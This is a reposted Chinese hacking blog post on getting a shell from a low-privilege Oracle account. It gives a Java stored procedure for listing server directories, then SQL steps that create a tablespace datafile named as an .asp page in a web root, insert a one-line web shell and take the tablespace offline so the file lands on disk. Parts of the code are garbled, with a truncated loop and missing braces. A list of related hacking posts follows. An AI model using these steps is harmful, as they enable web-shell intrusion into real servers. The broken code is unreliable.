linux得到低权shell,oracle低权限下获取shell

转载请标明:http://hi.baidu.com/hack_forensic 《关于oracle列目录的可行性测试》

经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj021320在文章<>最后说,当然这个方法缺点就是你要知道WEB路径.少费话,直接贴code:

create global temporary table BLUEUSER.dirlist(

filename varchar2(255),

filesize number,

filedate date)

on commit delete rows;

create or replace and compile java source named DirList as

import java.io.*;

import java.sql.*;

public class DirList

{

public static void getList(String directory) throws SQLException

{

File path=new File(directory);

String[] fileList=path.list();

String fileName;

long fileSize;

long fileDate;

for (int i=0;i

{

fileName=fileList[i];

File fpath=new File(directory+’/'+fileName);

fileSize=fpath.length();

fileDate=fpath.lastModified();

#sql{insert into BLUEUSER.dirlist(filename, filesize, filedate)

values(:fileName,:fileSize,to_date(’01/01/1970′,’mm/dd/yyyy’)+:fileDate/(24*60*60*1000))};

}

CREATE OR REPLACE PROCEDURE BLUEUSER.p_get_dir_list(i_directory IN VARCHAR2) AS

LANGUAGE JAVA NAME ‘DirList.getList(java.lang.String)’;

SQL> exec BLUEUSER.p_get_dir_list(‘/tmp’);

PL/SQL procedure successfully completed

select * from BLUEUSER.dirlist;

select * from BLUEUSER.dirlist where rownum<150;

select filename from BLUEUSER.dirlist where rownum<150;

select filename from BLUEUSER.dirlist;

truncate table BLUEUSER.dirlist; 好啊要不然是追加.

测试环境:oracle 9+redhat

——————ORACLE 建立数据文件WriteWebShell———————

SQLJ 存储过程写文件也可以，逼于无奈对方机器不支持SQLJ 还有 UTL_FILE包也被干掉了？

那也可以使用以下我说的这个方式

SQL> create tablespace kjtest datafile ‘e:\website\kj.asp’ size 100k nologging ;

表空间已创建。

这里记住了 100K为ORACLE 表空间最小的单位，如果你的一句话SHELL比较大那可以200K比较稳妥

但是最终建议一句话一定要最最简洁

SQL> CREATE TABLE WEBSHELL(C varchar2(100)) tablespace kjtest;

表已创建。

一般用 VARCHAR类型已经可以，表空间太小了，所以不可以为 CLOB或者 BLOB类型。

SQL> insert into WEBSHELL values(‘’);

已创建 1 行。

SQL> commit;

提交完成。

提交完成之后就 OK？ NO~ 因为数据还没有被 DBWn 进程刷到文件呢. 所以需要同步一下CKPT以及OFFLINE当前表空间

SQL> alter tablespace kjtest offline;

表空间已更改。

到这里你的一句话SHELL代码已经写到那个文件了

你会发现有这样的的代码

一句话shell已经OK了

最后使用后记得吧表空间删除

SQL> drop tablespace kjtest including contents;

表空间已删除。

linux得到低权shell,oracle低权限下获取shell相关推荐

oracle低权限下获取shell
转载请标明:http://hi.baidu.com/hack_forensic <关于oracle列目录的可行性测试> 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj ...
oracle 最小权限,oracle低权限下获取shell
转载请标明:http://hi.baidu.com/hack_forensic <关于oracle列目录的可行性测试> 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj ...
javaweb系统oracle锁表,oracle、websphere下获取数据库连接时出现死锁
环境 windows 2003 server websphere 7. druid 0.2.9 oracle 11 druid参数 initialSize=60 maxActive= 200 异常 [ ...
【Shell】在windows下编辑shell脚本
注意事项: 1.第一行:#!/bin/bash 2.Notepad++编辑器:将文档格式转换为unix
shell脚本系列：1、shell、bash和shell脚本
shell脚本系列:1.shell.bash和shell脚本文章目录 shell脚本系列:1.shell.bash和shell脚本 1. 前言 2. shell.Bash.shell script简 ...
获取Shell（提权）后的操作（windows、Linux）
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同. Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作 ...
Linux shell初识及权限理解
shell初识 Linux严格意义上说的是一个操作系统,我们称之为"核心(kernel)" ,但我们一般用户,不能直接使用kernel. 而是通过kernel的"壳&qu ...
linux初始：命令行解释器（shell）、权限
目录命令行解释器什么是命令行解释器(shell) 命令行解释器的作用权限权限的种类结合用户去理解权限如何查看权限用户和用户组如何看懂权限如何更改权限权限对于文件或文件夹的影响权限 ...
linux脚本赋权命令765,Linux权限命令chmod
一.Linux chmod命令修改文件和文件目录权限(默认情况下只有root用户才能使用).命令格式:chmod+修改内容+要修改的文件或者目录或者 chmod -R 修改内容要修改的文件或者 ...

linux得到低权shell,oracle低权限下获取shell

linux得到低权shell,oracle低权限下获取shell相关推荐

最新文章

热门文章